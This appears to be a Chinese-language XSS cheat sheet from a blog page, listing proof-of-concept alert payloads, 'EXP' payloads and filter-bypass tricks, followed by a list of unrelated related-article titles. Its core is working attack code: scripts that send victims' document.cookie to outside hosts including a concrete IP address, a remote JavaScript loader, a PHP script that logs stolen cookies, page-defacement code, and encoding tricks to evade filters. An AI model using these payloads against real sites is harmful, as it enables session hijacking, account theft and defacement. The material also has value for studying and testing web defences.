POC

<script>alert('xss')</script>   最简单常用的poc

"><script>alert(1)<script>

<a href=" οnclick=alert('xss')>type</a>  页面出现一个按钮type,点击触发onclick,然后执行弹窗。

<img src=http://1.1.1.1/a.jpg οnerrοr=alert('xss')>  加载图片,给一个错误的图片地址,然后执行弹窗

<script>window.location='http://1.1.1.1'</script> 重定向到指定的url地址

<iframe SRC="http://1.1.1.1/victim" height="0" width="0"></iframe>

οnmοuseοver=alert(document.domain)  闭合属性,构造on事件

οnmοusemοve=alert(1)

<input type="text" οnfοcus=prompt(1) autofocus> 利用input的autofocus属性,无需用户交互即可触发xss.

htmlspecialchars: 输入常用符号,看哪些符号没被实体编码。

如输入在href或src里面:javascript:alert(1)

js输出,输入的数据由js变量接收,通过</script>闭合即可

EXP

<script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>

篡改页面,将页面篡改为<h1></h1>里面的显示的文字

<script>new Image().src="http://yourhost/getcookie.php?cookie="+document.cookie;</script>

将别人登录的cookie信息捕获到自己的服务器上,自己的服务器上编写一个接收cookie信息的php脚本getcookie.php,此脚本将接收到的cookie信息写入到自动创阿金的txt文本cookie.txt里面

<script>document.location='http://47.99.184.173/getcookie.php?cookie='+document.cookie;</script>

与上一个获取cookie信息的payload相似,相当于这是第二种获取cookie信息的exp

<script src=http://1.1.1.1/a.js></script>

字节服务器上a.js的源码为:

var img=new Image();
img.src = "http://1.1.1.1/cookies.php?cookie="+document.cookie;

获取cookie信息的第三种方式,这种方式的payload比较简短,便于很好的利用。

这种间接的方式,可以适用于所有的exp,将攻击代码放在服务器上的一个js文件里面,然后在漏洞点利用<script>访问。

附上一个简短的getcookie.php脚本

<?php
$cookie = $_GET['cookie'];
$log=fopen("cookie.txt", "w");
fwrite($log, $cookie . "\n");
fclose($log);
?>

绕过方法

利用js双写或者大小写绕过: <scscriptript>alert(1)</scrscriptipt>

利用input弹窗

' oninput=alert`1` //
' oninput=alert`1` '
' onchange=alert`1` //
' onchange=alert`1`  '

利用链接弹窗(a标签) <a href="javascript:alert(1)">click me</a> //

利用Html实体编码如果

利用换行绕过

1.转义字符: 将xss语句转换为含有"\" 16进制或者8进制

(工具地址: http://tools88.com/safe/xss.php)

2.UBB标签: UBB标签是目前广泛运用到论坛,留言簿,以及其他网站系统的一种编码标签,类似[img]url[/img]这样的,用户在中间输入地址后即可,在发表的时候系统会自动改成<img src="url"</img>。这个URL就是用户输入的图片地址,XSS攻击中,可以利用这个特点来达到无需用户输入<>就能执行由用户所输入的代码,我们只要在输入网址的地址输入:

x"/**/onerror="alert('poruin')

那么经过转换后就变成了<img src="x"/**/οnerrοr="alert('poruin')"></img>

在JS中空格可以用/**/转换,如图:

JS还原函数

JS中的编码还原函数最常用的就是String.fromCharCode了,这个函数用于ascii码还原,一般来说,这个函数都要配合EVAL来使用才有效果。

在跨站中,String.fromCharCode主要是使用一些已经被列入黑名单的关键字或语句安全通过检测,把关键字或语句转换称为ASCII码,然后再用String.fromCharCode还原,因为大多数的过滤系统都不会把String.fromCharCode加以过滤,例如关键字alert被过滤掉,那就可以这么利用:

<img src="x"/**/onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))"></img>

XSS过滤绕过速查表:https://www.freebuf.com/articles/web/153055.html

xss公共平台:http://xss.fbisb.com

xss漏洞的poc与exp相关推荐

  1. 干货|常用渗透漏洞poc、exp收集整理

    CVE-2014-4113 Win64bit本地提权漏洞CVE-2014-4878 海康RCE漏洞CVE-2017-0143 永恒之蓝漏洞CVE-2017-0474 安卓MediaserverRCEC ...

  2. windows系统和linux系统可以使用相同的js代码吗_使用Sboxr自动发现和利用DOM(客户端)XSS漏洞...

    这一系列的博客文章将向你展示如何在单页或富JavaScript的应用程序上识别DOM XSS的问题.作为示例,我们将在DOM XSS playground(https://domgo.at)上解决10 ...

  3. XSS漏洞利用---PHPMyWind 任意密码重置漏洞

    [漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...

  4. Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

    Penetration_Testing_POC 搜集有关渗透测试中用到的POC.脚本.工具.文章等姿势分享,作为笔记吧,欢迎补充. Penetration_Testing_POC 请善用搜索[Ctrl ...

  5. 【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法

    目录 1 漏洞验证相关概念 2 XSS漏洞验证 2.1 常见POC 2.2 反射型XSS漏洞验证 2.3 存储型XSS漏洞验证 2.4 DOM型XSS漏洞验证 3 XSS语句构造与绕过 3.1 XSS ...

  6. 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证

    目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...

  7. 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析

    年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...

  8. 渗透中poc、exp、payload与shellcode的区别

    PoC,全称"Proof of Concept",中文"概念验证",常指一段漏洞证明的代码. Exp,全称"Exploit",中文" ...

  9. 渗透中Poc、Exp、Payload、Rce与Shellcode的区别

    备注:感谢原作者,本文只为备份学习资料. PoC,全称"Proof of Concept",中文"概念验证",常指一段漏洞证明的代码. Exp,全称" ...

最新文章

  1. 100+Python编程题给你练~(附答案)
  2. cobaltstrike安装_CobaltStrike + Metasploit 组合安装
  3. 定义一个Matrix类,实现矩阵的加法和乘法
  4. JAVA设计模式之抽象工厂模式
  5. B 站疯传!P8技术大佬分享了20个免费Java课程,白拿不谢!!
  6. linux7telnet测试通是提示如何,如何优雅的使用telnet测试端口连通性
  7. Linux pid_t 类型的定义
  8. Solidworks踩坑随笔
  9. Python-GUI界面设计(tkinter)
  10. android 6.0 usb网卡,Android安卓6.0使用技巧:让手机化身网卡和声卡
  11. stm32cubemx hal学习记录:JY901S串口
  12. 手机dpi修改工具_修改手机的分辨率,让你的手机更流畅
  13. Verilog专题(二十五)Lemmings4
  14. 判断HTML页面是点击历史返回打开,还是正常跳转打开
  15. Android setTag和getTag()的使用
  16. 19.Express结合multer上传图片
  17. 2021年广西卫生系统副高考试成绩查询,2021年广西卫生资格考试成绩查询-中国卫生人才网...
  18. 夺命雷公狗---DEDECMS----28dedecms浏览次数的完成
  19. win0 计算机管理没有用户,Win10电脑怎么启用管理员账户
  20. 水位测量是计算机在( )方面的应用,液位计在净化水处理水位测量方面的应用选择?...

热门文章

  1. android 串口通信_使用UART与ZYBO进行通信常用外设设计方案
  2. Spring学习-- SpEL表达式
  3. 浅谈分布式存储系统数据分布算法
  4. Linux上搭建h2引擎加载h2文件
  5. 蓝桥练习-算法训练 最大最小公倍数
  6. @font-face详细用法+实例——Web响应式前端学习笔记
  7. 【已解决】Class not found: “com.bjpowernode.MyTest“
  8. 【10月17日】2020年十月蓝桥杯A组题目【感想与总结】(热乎的)
  9. 蓝桥杯 试题 入门训练 序列求和——6行代码AC
  10. dede 验证码不显示 vdimgck.php,Dede后台验证码不显示解决方法详解(dedecms 5.7)